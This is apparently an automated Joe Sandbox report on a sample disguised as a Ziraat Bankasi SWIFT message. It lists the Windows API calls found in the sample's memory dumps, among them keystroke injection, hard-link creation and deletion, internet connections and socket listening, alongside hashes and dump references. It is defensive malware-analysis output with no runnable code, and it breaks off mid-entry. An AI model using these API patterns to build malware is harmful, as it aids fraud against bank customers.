                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                                        • Opcode ID: 23f90e9c18ce2cbb34c222a0f08f8d707ac76d164bc5a09ba415ad4c8867f9a0
                                                                                                                                                        • Instruction ID: 6401ae8ee1ec719cc19067ef1260392491f48ebfac84932f7885b2fdfc8bd894
                                                                                                                                                        • Opcode Fuzzy Hash: 23f90e9c18ce2cbb34c222a0f08f8d707ac76d164bc5a09ba415ad4c8867f9a0
                                                                                                                                                        • Instruction Fuzzy Hash: E441A771A00609AFEF21EF54CC55FEE7BB5AF49700F000069F945A7282DB709A85CBA1
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 000C3966
                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 000C3982
                                                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 000C39EF
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 000C3A4D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                        • Opcode ID: ea141eb18e828651c2df35623714c8117a9a465f9c57a24ac96b48af2aaeb63d
                                                                                                                                                        • Instruction ID: df809b266bd34a463e69f0303119fcd83fa0f5c76d0b8a5270b9932fed87ca94
                                                                                                                                                        • Opcode Fuzzy Hash: ea141eb18e828651c2df35623714c8117a9a465f9c57a24ac96b48af2aaeb63d
                                                                                                                                                        • Instruction Fuzzy Hash: F5412770A14208AEEF709BA49805FFDBBF5EB59310F04815EE4C1A22C1C7F48E95D762
                                                                                                                                                        APIs
                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000CE742
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 000CE768
                                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000CE78D
                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000CE7B9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                        • Opcode ID: 9bbbfdbfb8dc79736d11ee37ca867f46e023b88871d6ffd31711e124d74d9d76
                                                                                                                                                        • Instruction ID: 3e686ec2d27643a55b514fa798354ad7eb644b4c845564d1a99ed7f0d9f48e6f
                                                                                                                                                        • Opcode Fuzzy Hash: 9bbbfdbfb8dc79736d11ee37ca867f46e023b88871d6ffd31711e124d74d9d76
                                                                                                                                                        • Instruction Fuzzy Hash: 87413839200650EFCF11FF14C845A9DBBE5BF59720B098099E986AB3A2CB70FD40DB91
                                                                                                                                                        APIs
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000EB5D1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                                        • Opcode ID: 29d86ca0ce739f539191e9f1bd6c4d062d504e78d379c07ac6529580f9765537
                                                                                                                                                        • Instruction ID: d2534220d1c3bc4bb4e95485c68a3bee75237f4748002bdf090d3a7312fc557b
                                                                                                                                                        • Opcode Fuzzy Hash: 29d86ca0ce739f539191e9f1bd6c4d062d504e78d379c07ac6529580f9765537
                                                                                                                                                        • Instruction Fuzzy Hash: 6231ED75601684BFEF309F5ACC89FAE77A5AB06310F504502FA51F61E1CB74A9808B51
                                                                                                                                                        APIs
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 000ED807
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 000ED87D
                                                                                                                                                        • PtInRect.USER32(?,?,000EED5A), ref: 000ED88D
                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 000ED8FE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                        • Opcode ID: b378f869d588de80619d7999f8c7459fc4e1e19103cb6b8bd7cd2d31fd5cf164
                                                                                                                                                        • Instruction ID: ecce8c7e62e06efbb950037efee004b193f70f546adb9b60c6d683d8fafdc2c6
                                                                                                                                                        • Opcode Fuzzy Hash: b378f869d588de80619d7999f8c7459fc4e1e19103cb6b8bd7cd2d31fd5cf164
                                                                                                                                                        • Instruction Fuzzy Hash: 4241E374A00288EFCB11CF5AD980BADB7F5FF45310F1981A6E814EB261DB30E881CB50
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 000C3AB8
                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 000C3AD4
                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 000C3B34
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 000C3B92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                        • Opcode ID: 24e486099a385af126b44b6fe15a9132b5940503bdd8004f26d2e023c842aee6
                                                                                                                                                        • Instruction ID: b0c3c7a28483137a53e11c17e54d3f453047cc512fe3f4254ae951456d6d4038
                                                                                                                                                        • Opcode Fuzzy Hash: 24e486099a385af126b44b6fe15a9132b5940503bdd8004f26d2e023c842aee6
                                                                                                                                                        • Instruction Fuzzy Hash: 0C317330A10258AEEF709BA48819FFE7BF99B45310F04811EE6C1A32D2C7B48F81C761
                                                                                                                                                        APIs
                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000B4038
                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 000B4066
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B4094
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B40CA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                        • Opcode ID: 4d0e8951c6a7a6d5a4109be071db1d3782ee144a3e2358555ab2beff9c537dac
                                                                                                                                                        • Instruction ID: f1ab19c4a076a8d5d81cfccfa795a7f11204d451af3594b0177e8b0bbec7a610
                                                                                                                                                        • Opcode Fuzzy Hash: 4d0e8951c6a7a6d5a4109be071db1d3782ee144a3e2358555ab2beff9c537dac
                                                                                                                                                        • Instruction Fuzzy Hash: 0C31C131610216EFDB21AF74C848BFA7BF5FF41310F158428EA658B1A2E771DA91DB90
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000CAD4D
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 000CADDF
                                                                                                                                                          • Part of subcall function 000C4340: InterlockedIncrement.KERNEL32(?), ref: 000C4366
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000CAE35
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000CAE44
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$Clear$FreeIncrementInitInterlockedString
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3935303505-0
                                                                                                                                                        • Opcode ID: 7a3dea8ef44563ccf0bcc948460787e350f4f632dcc77d7f0bf2a7216a18d181
                                                                                                                                                        • Instruction ID: b403c6bafd6823642a8387b9b1905f1c60b93279a63caef0476775c252c5bb6d
                                                                                                                                                        • Opcode Fuzzy Hash: 7a3dea8ef44563ccf0bcc948460787e350f4f632dcc77d7f0bf2a7216a18d181
                                                                                                                                                        • Instruction Fuzzy Hash: EF31C871A0010A9BCF249FA4D454FBEB7F9FF85324B14811AE406DB681DF78C801DBA2
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 000EF211
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000FE4C0,?,?,?,?,?), ref: 000EF226
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 000EF270
                                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000FE4C0,?,?,?), ref: 000EF2A6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                                        • Opcode ID: eebcb59849d7be944ac3a199605b3ded504ba50af58c3ea13bf34385190311bd
                                                                                                                                                        • Instruction ID: 0e48997527d9a1af9b34616a0ccee627dc4fecdf1d9d497bbe3b7a85d0f61cb3
                                                                                                                                                        • Opcode Fuzzy Hash: eebcb59849d7be944ac3a199605b3ded504ba50af58c3ea13bf34385190311bd
                                                                                                                                                        • Instruction Fuzzy Hash: 3321B139600018BFCB258F95DC58EFE7BB5EF4A310F048069FA05572A1D3B09D90DB50
                                                                                                                                                        APIs
                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D4358
                                                                                                                                                          • Part of subcall function 000D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4401
                                                                                                                                                          • Part of subcall function 000D43E2: InternetCloseHandle.WININET(00000000), ref: 000D449E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1463438336-0
                                                                                                                                                        • Opcode ID: aaaa712167c989342fa1f42548ef10cad039d02311d2a2177133e4849701bc6f
                                                                                                                                                        • Instruction ID: 77fa48a08e68464b20123dd23f5bf817921cbb157f41db8135dcc4937ccfc3d6
                                                                                                                                                        • Opcode Fuzzy Hash: aaaa712167c989342fa1f42548ef10cad039d02311d2a2177133e4849701bc6f
                                                                                                                                                        • Instruction Fuzzy Hash: 9B21D131200701BBEB219FA49C01FBBBBE9FF48714F04401BFA5596750DBB199219BB0
                                                                                                                                                        APIs
                                                                                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000D8AE0
                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000D8AF2
                                                                                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 000D8AFF
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D8B16
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 385091864-0
                                                                                                                                                        • Opcode ID: 00f59ce342a73b5093fb57ac478cbf1fe55f2469a02f0b106f8650388253fa1a
                                                                                                                                                        • Instruction ID: 622d9d6956f61fd4d330ca74c40866e01e68928bdb1aa1b2aebcd2623ac7e7a4
                                                                                                                                                        • Opcode Fuzzy Hash: 00f59ce342a73b5093fb57ac478cbf1fe55f2469a02f0b106f8650388253fa1a
                                                                                                                                                        • Instruction Fuzzy Hash: F9216672A001249FC7119F69D895ADE7BFCEF49364F00816AF849D7291DB74D9818FA0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?), ref: 000C1E77
                                                                                                                                                          • Part of subcall function 000C1E68: lstrcpyW.KERNEL32(00000000,?,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C1E9D
                                                                                                                                                          • Part of subcall function 000C1E68: lstrcmpiW.KERNEL32(00000000,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?), ref: 000C1ECE
                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0AD4
                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0AFA
                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0B2E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                        • String ID: cdecl
                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                        • Opcode ID: d67e927aa1398f267388b6141687771f4018400cc6680bfc6ec6960ece746581
                                                                                                                                                        • Instruction ID: 1e785d026b8cf406455594b06e2c40840d1060dbd9a52d4056115607a81c8950
                                                                                                                                                        • Opcode Fuzzy Hash: d67e927aa1398f267388b6141687771f4018400cc6680bfc6ec6960ece746581
                                                                                                                                                        • Instruction Fuzzy Hash: 1F118E36200305EFDB25AF64DC45EBE77E8FF49354B80406AF906CB2A1EB719850D7A1
                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 000B2FB5
                                                                                                                                                          • Part of subcall function 000A395C: __FF_MSGBANNER.LIBCMT ref: 000A3973
                                                                                                                                                          • Part of subcall function 000A395C: __NMSG_WRITE.LIBCMT ref: 000A397A
                                                                                                                                                          • Part of subcall function 000A395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                                        • Opcode ID: 15d2bc74567129d1a411bcb0cde56028908ed15de2f125d1e580a10f91346e47
                                                                                                                                                        • Instruction ID: ff2ee9eba85c1b56483c0325e1ae6dd6b52721f09e16efc6d1492276cd76537b
                                                                                                                                                        • Opcode Fuzzy Hash: 15d2bc74567129d1a411bcb0cde56028908ed15de2f125d1e580a10f91346e47
                                                                                                                                                        • Instruction Fuzzy Hash: D011C632509216ABDB363BF4FC157EA3BE4AF09370F308539F94D9A152DB74C9809A90
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 0009EBB2
                                                                                                                                                          • Part of subcall function 000851AF: _memset.LIBCMT ref: 0008522F
                                                                                                                                                          • Part of subcall function 000851AF: _wcscpy.LIBCMT ref: 00085283
                                                                                                                                                          • Part of subcall function 000851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00085293
                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0009EC07
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0009EC16
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F3C88
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378193009-0
                                                                                                                                                        • Opcode ID: 5e03ba5de28b753cea2009e5d71e54589da6ace6c3fbaef20f9266e075cb38cf
                                                                                                                                                        • Instruction ID: cc493ba90c0ff38a4b28fd6a0e5260ea2f2c6c74fb416da14a8dca541208e790
                                                                                                                                                        • Opcode Fuzzy Hash: 5e03ba5de28b753cea2009e5d71e54589da6ace6c3fbaef20f9266e075cb38cf
                                                                                                                                                        • Instruction Fuzzy Hash: F121F570504784AFEB72DB28C859BEBBBEC9B01318F04008DE3DA57242C3B06A859B51
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000C05AC
                                                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000C05C7
                                                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000C05DD
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 000C0632
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
